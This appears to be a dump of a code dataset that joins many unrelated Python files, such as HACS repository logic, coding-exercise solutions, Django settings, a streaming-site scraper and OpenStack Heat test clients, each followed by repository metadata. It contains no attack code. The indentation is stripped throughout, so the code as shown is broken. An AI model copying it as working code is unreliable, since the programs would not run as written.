self.repository_object = await self.github.get_repo(
self.information.full_name
)
# Custom step 1: Validate content.
if self.repository_manifest:
if self.repository_manifest.content_in_root:
self.content.path.remote = ""
if self.content.path.remote == "custom_components":
ccdir = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
if not isinstance(ccdir, list):
self.validate.errors.append("Repostitory structure not compliant")
for item in ccdir or []:
if item.type == "dir":
self.content.path.remote = item.path
break
if self.repository_manifest.zip_release:
self.content.objects = self.releases.last_release_object.assets
else:
self.content.objects = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
self.content.files = []
for filename in self.content.objects or []:
self.content.files.append(filename.name)
if not await self.get_manifest():
self.validate.errors.append("Missing manifest file.")
# Handle potential errors
if self.validate.errors:
for error in self.validate.errors:
if not self.system.status.startup:
self.logger.error(error)
return self.validate.success
async def registration(self):
"""Registration."""
if not await self.validate_repository():
return False
# Run common registration steps.
await self.common_registration()
# Get the content of the manifest file.
await self.get_manifest()
# Set local path
self.content.path.local = self.localpath
async def update_repository(self):
"""Update."""
await self.common_update()
# Get integration objects.
if self.repository_manifest:
if self.repository_manifest.content_in_root:
self.content.path.remote = ""
if self.content.path.remote == "custom_components":
ccdir = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
if not isinstance(ccdir, list):
self.validate.errors.append("Repostitory structure not compliant")
self.content.path.remote = ccdir[0].path
try:
self.content.objects = await self.repository_object.get_contents(
self.content.path.remote, self.ref
)
except AIOGitHubException:
return
self.content.files = []
for filename in self.content.objects or []:
self.content.files.append(filename.name)
await self.get_manifest()
# Set local path
self.content.path.local = self.localpath
async def reload_custom_components(self):
"""Reload custom_components (and config flows)in HA."""
self.logger.info("Reloading custom_component cache")
del self.hass.data["custom_components"]
await async_get_custom_components(self.hass)
async def get_manifest(self):
"""Get info from the manifest file."""
manifest_path = f"{self.content.path.remote}/manifest.json"
try:
manifest = await self.repository_object.get_contents(
manifest_path, self.ref
)
manifest = json.loads(manifest.content)
except Exception: # pylint: disable=broad-except
return False
if manifest:
self.manifest = manifest
self.information.authors = manifest["codeowners"]
self.domain = manifest["domain"]
self.information.name = manifest["name"]
self.information.homeassistant_version = manifest.get("homeassistant")
# Set local path
self.content.path.local = self.localpath
return True
return False
| [
"[email protected]"
] | |
d95810328bbed890c7daf776a9675beedc3d8cd2 | 473568bf080e3637ee118b374f77e9f561286c6c | /SudoPlacementCourse/LeadersInAnArray.py | b2b997ace46a797ad0dd241ff7cd5667a35adba3 | [] | no_license | VineetPrasadVerma/GeeksForGeeks | c2f7fc94b0a07ba146025ca8a786581dbf7154c8 | fdb4e4a7e742c4d67015977e3fbd5d35b213534f | refs/heads/master | 2020-06-02T11:23:11.421399 | 2020-01-07T16:51:18 | 2020-01-07T16:51:18 | 191,138,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,241 | py | # n = int(input())
#
# for k in range(n):
# final_ans_list = []
# size_of_array = int(input())
# list_of_elements = input()
#
# int_list_of_elements = [int(i) for i in list_of_elements.split()]
#
# for i in range(len(int_list_of_elements)):
# if i == len(int_list_of_elements) - 1:
# final_ans_list.append(int_list_of_elements[i])
# break
#
# max_element = int_list_of_elements[i]
# temp_max_element = max(int_list_of_elements[i+1:])
#
# if max_element >= temp_max_element:
# final_ans_list.append(int_list_of_elements[i])
#
# string_list_of_elements = [str(i) for i in final_ans_list]
# print(" ".join(string_list_of_elements))
n = int(input())
for _ in range(n):
final_ans_list = []
size_of_array = int(input())
list_of_elements = input()
int_list_of_elements = [int(i) for i in list_of_elements.split()]
maximum = -1
for i in range(len(int_list_of_elements)-1, -1, -1):
if int_list_of_elements[i] >= maximum:
maximum = int_list_of_elements[i]
final_ans_list.append(maximum)
for i in range(len(final_ans_list)-1, -1, -1):
print(final_ans_list[i], end=" ")
print()
| [
"[email protected]"
] | |
8294fce530b848259f949592831c9de1c760dbad | 14a913fce4b538b22f28409645cd6abe3455808f | /bigquery/cloud-client/natality_tutorial.py | 5bfa8f1d27a9736075f271b77657e9342df6d688 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | iamLoi/Python-Random-Number-Generator | 8da7dbd37cb13a01232c8ed49b9df35a99c63d73 | 7579e8b15130802aaf519979e475c6c75c403eda | refs/heads/master | 2022-08-29T19:05:32.649931 | 2019-09-14T14:48:58 | 2019-09-14T14:48:58 | 208,454,877 | 2 | 1 | Apache-2.0 | 2022-08-05T21:57:49 | 2019-09-14T14:51:05 | Python | UTF-8 | Python | false | false | 2,926 | py | #!/usr/bin/env python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def run_natality_tutorial():
# [START bigquery_query_natality_tutorial]
"""Create a Google BigQuery linear regression input table.
In the code below, the following actions are taken:
* A new dataset is created "natality_regression."
* A query is run against the public dataset,
bigquery-public-data.samples.natality, selecting only the data of
interest to the regression, the output of which is stored in a new
"regression_input" table.
* The output table is moved over the wire to the user's default project via
the built-in BigQuery Connector for Spark that bridges BigQuery and
Cloud Dataproc.
"""
from google.cloud import bigquery
# Create a new Google BigQuery client using Google Cloud Platform project
# defaults.
client = bigquery.Client()
# Prepare a reference to a new dataset for storing the query results.
dataset_ref = client.dataset('natality_regression')
dataset = bigquery.Dataset(dataset_ref)
# Create the new BigQuery dataset.
dataset = client.create_dataset(dataset)
# In the new BigQuery dataset, create a reference to a new table for
# storing the query results.
table_ref = dataset.table('regression_input')
# Configure the query job.
job_config = bigquery.QueryJobConfig()
# Set the destination table to the table reference created above.
job_config.destination = table_ref
# Set up a query in Standard SQL, which is the default for the BigQuery
# Python client library.
# The query selects the fields of interest.
query = """
SELECT
weight_pounds, mother_age, father_age, gestation_weeks,
weight_gain_pounds, apgar_5min
FROM
`bigquery-public-data.samples.natality`
WHERE
weight_pounds IS NOT NULL
AND mother_age IS NOT NULL
AND father_age IS NOT NULL
AND gestation_weeks IS NOT NULL
AND weight_gain_pounds IS NOT NULL
AND apgar_5min IS NOT NULL
"""
# Run the query.
query_job = client.query(query, job_config=job_config)
query_job.result() # Waits for the query to finish
# [END bigquery_query_natality_tutorial]
if __name__ == '__main__':
run_natality_tutorial()
| [
"[email protected]"
] | |
0618850a5db7746378ebd7c6d18fc84b9305a5e3 | 05324b134108e0e0fde392e0ae0fc22bfa1fb75f | /df_user/islogin.py | d2149c4633a4871adc7f90b232f8ccc8e25afcec | [] | no_license | 2339379789/zhang_ttshop | 2c8d546b9ed3710fd1f48d6075ea01955247d34f | 44f9eb998182f4aa027d5d313b4957410b54a39d | refs/heads/master | 2020-03-06T15:40:54.261769 | 2018-03-27T09:23:52 | 2018-03-27T09:23:52 | 126,960,140 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | from django.http import HttpResponseRedirect
def islogin(func):
def login_fun(request, *args, **kwargs):
if request.session.get('user_id'):
return func(request, *args, **kwargs)
else:
red = HttpResponseRedirect('/user/login')
red.set_cookie('url', request.get_full_path)
return red
return login_fun
| [
"[email protected]"
] | |
fcdd844f805ea4a7bd79824935397e4ae355b4f3 | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/4052/354004052.py | c318eb1028c5e6c2d9a7772e6ec4c9f7cf7069da | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 453 | py | from bots.botsconfig import *
from records004052 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'AY',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'M10', MIN: 1, MAX: 1},
{ID: 'P4', MIN: 1, MAX: 20, LEVEL: [
{ID: 'X01', MIN: 1, MAX: 1},
{ID: 'X02', MIN: 0, MAX: 9999},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
c3b06571705e3d42ea421dbcc6cb94538267f247 | 078533ce919371451564646e3c311c8dd6fca7ea | /app/settings/prod.py | 1425b25dbaa062e89c3c39a5947da1224923cd03 | [] | no_license | cr8ivecodesmith/djdraft | cf5415a967dc7fc6f4f8d191def9c2b687c0d744 | 364ded3ea43acc874de367cd679c4bddfb64d837 | refs/heads/master | 2020-04-05T23:07:20.690873 | 2016-10-06T05:11:29 | 2016-10-06T05:11:29 | 23,010,461 | 2 | 1 | null | 2016-10-03T13:42:04 | 2014-08-16T04:17:23 | Python | UTF-8 | Python | false | false | 1,558 | py | from .base import *
DEBUG = False
ALLOWED_HOSTS = [
'{{ project_name }}.dev',
]
###### APP CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS += [
]
###### DATABASE CONFIGURATION
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'caffeinedb',
'USER': 'caffeine',
'PASSWORD': 'changeme',
'HOST': 'postgres',
'PORT': 5432,
}
}
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/topics/email/#smtp-backend
EMAIL_BACKEND = 'django_smtp_ssl.SSLEmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = get_key('EMAIL_HOST_USER')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = get_key('EMAIL_HOST_PASSWORD')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = 'smtp.{{ project_name }}.dev'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 465
SERVER_EMAIL = 'errors@{{ project_name }}.dev'
DEFAULT_FROM_EMAIL = 'noreply@{{ project_name }}.dev'
###### MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS += [
('caffeine prod', 'errors@{{ project_name }}.dev'),
]
###### CELERY CONFIGURATION
# CELERY_ROUTES = {
# 'app.tasks.example_queue': {
# 'queue': 'express_queue'
# },
# }
| [
"[email protected]"
] | |
0af0e6aeb4bf93bb5c2c00acba6daf1feb4788c2 | 0566cf76b456518875edecece15e763a36a4795f | /scrapers/tv_showsonline_com.py | 6208f8a041fec633df9bb9e2989a3db26e001ce2 | [] | no_license | theclonedude/Scraping_BeautifulSoup_phantomjs | 684b1f7a993e0d2555daa7a5455cf19bd29b0b1b | faf653feae46c21a72d13b2123cdebdb2f7c05d8 | refs/heads/master | 2023-03-16T19:36:14.867361 | 2018-06-14T14:21:02 | 2018-06-14T14:21:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,148 | py |
from sandcrawler.scraper import ScraperBase
from sandcrawler.scraper import SimpleScraperBase
class TvShowsOnline(SimpleScraperBase):
BASE_URL = 'http://www.7stream.pro/'
OTHER_URLS = ['http://tv-showsonline.com', ]
def setup(self):
self.register_scraper_type(ScraperBase.SCRAPER_TYPE_OSP)
self.search_term_language = 'eng'
raise NotImplementedError('the website returns the bad gateway error')
self.register_media(ScraperBase.MEDIA_TYPE_FILM)
self.register_media(ScraperBase.MEDIA_TYPE_TV)
for url in [self.BASE_URL, ] + self.OTHER_URLS:
self.register_url(ScraperBase.URL_TYPE_SEARCH, url)
self.register_url(ScraperBase.URL_TYPE_LISTING, url)
def _fetch_search_url(self, search_term, media_type):
return self.BASE_URL + '/?s='+ '%s' % self.util.quote(search_term)
def _fetch_no_results_text(self):
return 'No Articles Found'
def _fetch_next_button(self, soup):
link = soup.select_one('a[class="next page-numbers"]')
self.log.debug(link)
self.log.debug('------------------------')
return link['href'] if link else None
def _parse_search_result_page(self, soup):
results = soup.select('div.item_content h4 a')
if not results or len(results) == 0:
return self.submit_search_no_results()
for result in results:
self.submit_search_result(
link_url = result['href'],
link_title = result.text
)
def _parse_parse_page(self, soup):
title = soup.select_one('h1[class="entry_title entry-title"]').text.strip()
season, episode = self.util.extract_season_episode(title)
titles = soup.select('span.ser-name')
index = 0
for link in soup.select('a.wo-btn'):
self.submit_parse_result(
index_page_title = self.util.get_page_title(soup),
link_url=link['href'],
link_title=titles[index].text,
series_season=season,
series_episode=episode
)
index += 1
| [
"[email protected]"
] | |
585c1f38e68fa896e9f1b91523d7cde15f833d05 | 544fe02a27cc4d987724b1bf45c2ba2994676521 | /Q6.3_brain_teasers.py | c42fb93923fdbb832381c85a4fbe252f28b128c3 | [
"Unlicense"
] | permissive | latika18/learning | 1e7a6dbdea399b845970317dc62089911a13df1c | a57c9aacc0157bf7c318f46c1e7c4971d1d55aea | refs/heads/master | 2021-06-16T19:20:28.146547 | 2019-09-03T06:43:28 | 2019-09-03T06:43:28 | 115,537,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | #You have a five quart jug and a three quart jug, and an unlimited supply of water (but no measuring cups).
How would you come up with exactly four quarts of water?
#NOTE: The jugs are oddly shaped, such that filling up exactly ‘half’ of the jug would be impossible.
_
________________________________________________________________
5 Quart Contents 3 Quart Contents Note
5 0 Filled 5 quart jug
2 3 Filled 3Q with 5Q’s contents
0 2 Dumped 3Q
5 2 Filled 5Q
4 3 Fill remainder of 3Q with 5Q
4
Done! We have four quarts
| [
"[email protected]"
] | |
e2e7d5b9b92f7a0b1b6801b43db9c95bca9229f0 | 1d159ff6d4d72b1a2399916ec1e28ef885b59323 | /solutions/module_3/01_guess_my_number.py | 4b9c9b119b0c1c64362318c3850d074b0c21f484 | [] | no_license | Zerl1990/python_essentials | 4e329b6e36b36ff340d505b26608d2b244ad2d09 | ce257c25072debed9717960591e39c586edd7110 | refs/heads/master | 2023-02-28T17:42:17.465769 | 2021-02-02T23:39:41 | 2021-02-02T23:39:41 | 297,385,479 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | import random
print((
"+=========================================+\n"
"| Guess my number! |\n"
"| Please, select a numbers between [0-100]|\n"
"| Let's start you have 10 opportunities |\n"
"+=========================================+\n"
))
my_number = random.randint(0, 100)
opportunities = 0
max_opportunities = 10
guess = -1
win = False
while not win and opportunities < max_opportunities:
guess = int(input('What is the number?: '))
win = (my_number == guess)
opportunities += 1
if my_number < guess:
print(f'[---] My number is less than {guess}')
elif my_number > guess:
print(f'[+++] My number is greater than {guess}')
else:
print('You found my number!')
if win:
print(f'It only took {opportunities} opportunities, you have won!!!')
else:
print("Better luck next time")
| [
"[email protected]"
] | |
3972d6d7840538ecae880e9e1fda6b25c54b8bb0 | db12b990924703cd74748d8585cd9c11fafa6746 | /h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2oas_list.py | 3e7ec87a09dad726385a034be07e5ed147db3d49 | [
"Apache-2.0"
] | permissive | h2oai/h2o-3 | 919019a8f297eec676011a9cfd2cc2d97891ce14 | d817ab90c8c47f6787604a0b9639b66234158228 | refs/heads/master | 2023-08-17T18:50:17.732191 | 2023-08-17T16:44:42 | 2023-08-17T16:44:42 | 17,371,412 | 6,872 | 2,345 | Apache-2.0 | 2023-09-14T18:05:40 | 2014-03-03T16:08:07 | Jupyter Notebook | UTF-8 | Python | false | false | 727 | py | import sys
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
from h2o.utils.typechecks import assert_is_type
def h2oas_list():
"""
Python API test: h2o.as_list(data, use_pandas=True, header=True)
Copied from pyunit_frame_as_list.py
"""
iris = h2o.import_file(path=pyunit_utils.locate("smalldata/iris/iris_wheader.csv"))
res1 = h2o.as_list(iris, use_pandas=False)
assert_is_type(res1, list)
res1 = list(zip(*res1))
assert abs(float(res1[0][9]) - 4.4) < 1e-10 and abs(float(res1[1][9]) - 2.9) < 1e-10 and \
abs(float(res1[2][9]) - 1.4) < 1e-10, "incorrect values"
if __name__ == "__main__":
pyunit_utils.standalone_test(h2oas_list)
else:
h2oas_list()
| [
"[email protected]"
] | |
c79d336c33025ee87041b0924dfe4af9287a02f3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03087/s875530520.py | c6f926255e87de91fe2fee869e4c531b1ffd87e1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | N, Q = map(int, input().split())
S = str(input())
li = []
cnt = 0
for i in range(N-1):
if S[i]=='A' and S[i+1]=='C':
cnt += 1
li.append(cnt)
else:
li.append(cnt)
for i in range(Q):
l, r = map(int, input().split())
if l > 1:
ans = li[r-2] - li[l-2]
else:
ans = li[r-2]
print(ans)
| [
"[email protected]"
] | |
16d806ed7bb7721136f1534dbe98b1aaa13ec985 | b15c47a45207e854fb002d69f7e33f8943a5e2b3 | /cluster/preprocess/pre_node_merge_text2seq.py | c25a02debf845bcb7cf7835b41e46d424efd847a | [
"Apache-2.0"
] | permissive | yurimkoo/tensormsa | e1af71c00a6b2ec3b3ed35d5adad7bafc34c6fbe | 6ad2fbc7384e4dbe7e3e63bdb44c8ce0387f4b7f | refs/heads/master | 2021-07-22T13:41:45.110348 | 2017-11-02T07:13:31 | 2017-11-02T07:13:31 | 109,469,204 | 1 | 0 | null | 2017-11-04T05:19:51 | 2017-11-04T05:19:50 | null | UTF-8 | Python | false | false | 2,165 | py | from cluster.preprocess.pre_node import PreProcessNode
from master.workflow.preprocess.workflow_pre_merge import WorkFlowPreMerge as WFPreMerge
class PreNodeMergeText2Seq(PreProcessNode):
"""
"""
def run(self, conf_data):
return True
def _init_node_parm(self, key):
"""
:return:
"""
wf_conf = WFPreMerge(key)
self.batch_size = wf_conf.get_batchsize()
self.merge_rule = wf_conf.get_merge_rule()
self.merge_type = wf_conf.get_type()
self.state_code = wf_conf.get_state_code()
def _set_progress_state(self):
pass
def load_data(self, node_id, parm = 'all'):
"""
load train data
:param node_id:
:param parm:
:return:
"""
self._init_node_parm(node_id)
if(self.merge_type == 'seq2seq') :
return self._merge_seq2seq_type()
else :
raise Exception ("merge node error: not defined type {0}".format(self.merge_type))
def _merge_seq2seq_type(self):
"""
merge two data node into one for seq2seq anal
:return:
"""
file_lists = []
encode_data = []
encode_node_list = self.merge_rule['encode_node']
if (len(encode_node_list) > 0):
for node_name in encode_node_list:
cls_path, cls_name = self.get_cluster_exec_class(str(self.state_code) + "_" + node_name)
dyna_cls = self.load_class(cls_path, cls_name)
encode_data = encode_data + dyna_cls.load_data(self.state_code + "_" + node_name, parm='all')
file_lists.append(encode_data)
decode_data = []
decode_node_list = self.merge_rule['decode_node']
if (len(decode_node_list) > 0):
for node_name in decode_node_list:
cls_path, cls_name = self.get_cluster_exec_class(self.state_code + "_" + node_name)
dyna_cls = self.load_class(cls_path, cls_name)
decode_data = decode_data + dyna_cls.load_data(self.state_code + "_" + node_name, parm='all')
file_lists.append(decode_data)
return file_lists | [
"[email protected]"
] | |
ae3450610d3f4a3c4469aa2562e125c8a4c0108f | 475e2fe71fecddfdc9e4610603b2d94005038e94 | /Facebook/moveZeroes.py | f41fef3843fc872dc295c4699bbbe39783028f77 | [] | no_license | sidhumeher/PyPractice | 770473c699aab9e25ad1f8b7b7cd8ad05991d254 | 2938c14c2e285af8f02e2cfc7b400ee4f8d4bfe0 | refs/heads/master | 2021-06-28T20:44:50.328453 | 2020-12-15T00:51:39 | 2020-12-15T00:51:39 | 204,987,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | '''
Created on Oct 8, 2020
@author: sidteegela
'''
'''
Input: [0,1,0,3,12]
Output: [1,3,12,0,0]
Input: [0,0]
Output: [0,0]
'''
'''
A two-pointer approach could be helpful here. The idea would be to have one pointer
for iterating the array and another pointer that just works on the non-zero elements
of the array.
'''
def moveZeroes(nums):
p = 0
nonZ = 0
while nonZ < len(nums):
if nums[nonZ] != 0:
nums[p], nums[nonZ] = nums[nonZ], nums[p]
p += 1
nonZ += 1
print(nums)
if __name__ == '__main__':
pass
| [
"[email protected]"
] | |
2ff02576828483feb35dafe118dc773c7fb9f7a0 | da19363deecd93a73246aaea877ee6607daa6897 | /xlsxwriter/test/comparison/test_page_breaks05.py | fb2c64036f0be6ae53d7ae0229ca42202a630f17 | [] | no_license | UNPSJB/FarmaciaCrisol | 119d2d22417c503d906409a47b9d5abfca1fc119 | b2b1223c067a8f8f19019237cbf0e36a27a118a6 | refs/heads/master | 2021-01-15T22:29:11.943996 | 2016-02-05T14:30:28 | 2016-02-05T14:30:28 | 22,967,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'page_breaks05.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/printerSettings/printerSettings1.bin',
'xl/worksheets/_rels/sheet1.xml.rels']
self.ignore_elements = {'[Content_Types].xml': ['<Default Extension="bin"'],
'xl/worksheets/sheet1.xml': ['<pageMargins', '<pageSetup']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with page breaks."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.set_v_pagebreaks([8, 3, 1, 0])
worksheet.write('A1', 'Foo')
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
2ae73fa529d6a5d8123828c55ea1d50f63660ebd | 4a43cded9d76bd05ca87f037de19ff921a60e151 | /13day/07-线程多任务.py | 4669c5331f43b6623bc152dc6442a8ad57e8eec5 | [] | no_license | lishuang1994/-1807 | f7d54c3c93d41539747fc77529d56e73a931676f | 23ee6d351a2797d3f5ba7907954d1a93d2745c10 | refs/heads/master | 2020-03-25T10:09:39.333264 | 2018-08-22T10:53:49 | 2018-08-22T10:53:49 | 143,685,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import time
from threading import Thread
def saysorry():
print("亲爱的,跪安了")
time.sleep(1)
for i in range(5):
#t = Threadinng(target=saysorry)
#t.start()
saysorry()
| [
"[email protected]"
] | |
56e7a6002a1b13179f7eeff237b55cbc56349463 | ca2b93910a308b92712cd81ac12e7345ddb7c9d1 | /r_venv/bin/chardetect | a7917fbfdbafa7afbe83d9a730a5833521b87b66 | [] | no_license | KeksikProg/rrs_site | e90eb146573b4dfc8a3a7d082febb43e4f904e9e | 41fcbbc052b89bf5d16604b5b6a6dc14ab74ad69 | refs/heads/master | 2023-06-27T03:59:36.984418 | 2021-01-02T21:31:40 | 2021-01-02T21:31:40 | 315,104,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/maxek/python/rrs_site/r_venv/bin/python3.8
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
e34d413a8c1c98d6d21b693a46353b5a9c8d1190 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2819/60731/291725.py | 8bfd0a4aca43e95e2c7b094a9d0e61a6a52acd4a | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | n=int(input())
data=list(map(int,input().split()))
numof1=data.count(1)
numof2=data.count(2)
numof3=data.count(3)
numof4=data.count(4)
ans=0
ans+=numof4
num1=int(numof1/4)
ans+=num1
numof1-=4*num1
num2=int(numof2/2)
ans+=num2
numof2-=2*num2
if (num2+numof3)>=numof1:
ans+=(numof2+numof3)
else:
ans+=numof1
print(ans) | [
"[email protected]"
] | |
55782bca4fc53bfb30a3d26d1336c6538a21a16a | 6b8c3974d3ce5f7841e51dcb406666c0c5d92155 | /heat/heat_integrationtests/common/clients.py | c7a7f60e6cf45d26c6119542ab40388bb7cfed8a | [
"Apache-2.0"
] | permissive | swjang/cloudexchange | bbbf78a2e7444c1070a55378092c17e8ecb27059 | c06ed54f38daeff23166fb0940b27df74c70fc3e | refs/heads/master | 2020-12-29T03:18:43.076887 | 2015-09-21T07:13:22 | 2015-09-21T07:13:22 | 42,845,532 | 1 | 1 | null | 2015-09-21T07:13:22 | 2015-09-21T05:19:35 | C++ | UTF-8 | Python | false | false | 5,888 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import ceilometerclient.client
import cinderclient.client
import heatclient.client
import keystoneclient.exceptions
import keystoneclient.v2_0.client
import neutronclient.v2_0.client
import novaclient.client
import swiftclient
class ClientManager(object):
"""
Manager that provides access to the official python clients for
calling various OpenStack APIs.
"""
CINDERCLIENT_VERSION = '1'
HEATCLIENT_VERSION = '1'
NOVACLIENT_VERSION = '2'
CEILOMETER_VERSION = '2'
def __init__(self, conf):
self.conf = conf
self.identity_client = self._get_identity_client()
self.orchestration_client = self._get_orchestration_client()
self.compute_client = self._get_compute_client()
self.network_client = self._get_network_client()
self.volume_client = self._get_volume_client()
self.object_client = self._get_object_client()
self.metering_client = self._get_metering_client()
def _get_orchestration_client(self):
region = self.conf.region
endpoint = os.environ.get('HEAT_URL')
if os.environ.get('OS_NO_CLIENT_AUTH') == 'True':
token = None
else:
keystone = self._get_identity_client()
token = keystone.auth_token
try:
if endpoint is None:
endpoint = keystone.service_catalog.url_for(
attr='region',
filter_value=region,
service_type='orchestration',
endpoint_type='publicURL')
except keystoneclient.exceptions.EndpointNotFound:
return None
else:
return heatclient.client.Client(
self.HEATCLIENT_VERSION,
endpoint,
token=token,
username=self.conf.username,
password=self.conf.password)
def _get_identity_client(self):
return keystoneclient.v2_0.client.Client(
username=self.conf.username,
password=self.conf.password,
tenant_name=self.conf.tenant_name,
auth_url=self.conf.auth_url,
insecure=self.conf.disable_ssl_certificate_validation)
def _get_compute_client(self):
dscv = self.conf.disable_ssl_certificate_validation
region = self.conf.region
client_args = (
self.conf.username,
self.conf.password,
self.conf.tenant_name,
self.conf.auth_url
)
# Create our default Nova client to use in testing
return novaclient.client.Client(
self.NOVACLIENT_VERSION,
*client_args,
service_type='compute',
endpoint_type='publicURL',
region_name=region,
no_cache=True,
insecure=dscv,
http_log_debug=True)
def _get_network_client(self):
auth_url = self.conf.auth_url
dscv = self.conf.disable_ssl_certificate_validation
return neutronclient.v2_0.client.Client(
username=self.conf.username,
password=self.conf.password,
tenant_name=self.conf.tenant_name,
endpoint_type='publicURL',
auth_url=auth_url,
insecure=dscv)
def _get_volume_client(self):
auth_url = self.conf.auth_url
region = self.conf.region
endpoint_type = 'publicURL'
dscv = self.conf.disable_ssl_certificate_validation
return cinderclient.client.Client(
self.CINDERCLIENT_VERSION,
self.conf.username,
self.conf.password,
self.conf.tenant_name,
auth_url,
region_name=region,
endpoint_type=endpoint_type,
insecure=dscv,
http_log_debug=True)
def _get_object_client(self):
dscv = self.conf.disable_ssl_certificate_validation
args = {
'auth_version': '2.0',
'tenant_name': self.conf.tenant_name,
'user': self.conf.username,
'key': self.conf.password,
'authurl': self.conf.auth_url,
'os_options': {'endpoint_type': 'publicURL'},
'insecure': dscv,
}
return swiftclient.client.Connection(**args)
def _get_metering_client(self):
dscv = self.conf.disable_ssl_certificate_validation
keystone = self._get_identity_client()
try:
endpoint = keystone.service_catalog.url_for(
attr='region',
filter_value=self.conf.region,
service_type='metering',
endpoint_type='publicURL')
except keystoneclient.exceptions.EndpointNotFound:
return None
else:
args = {
'username': self.conf.username,
'password': self.conf.password,
'tenant_name': self.conf.tenant_name,
'auth_url': self.conf.auth_url,
'insecure': dscv,
'region_name': self.conf.region,
'endpoint_type': 'publicURL',
'service_type': 'metering',
}
return ceilometerclient.client.Client(self.CEILOMETER_VERSION,
endpoint, **args)
| [
"[email protected]"
] | |
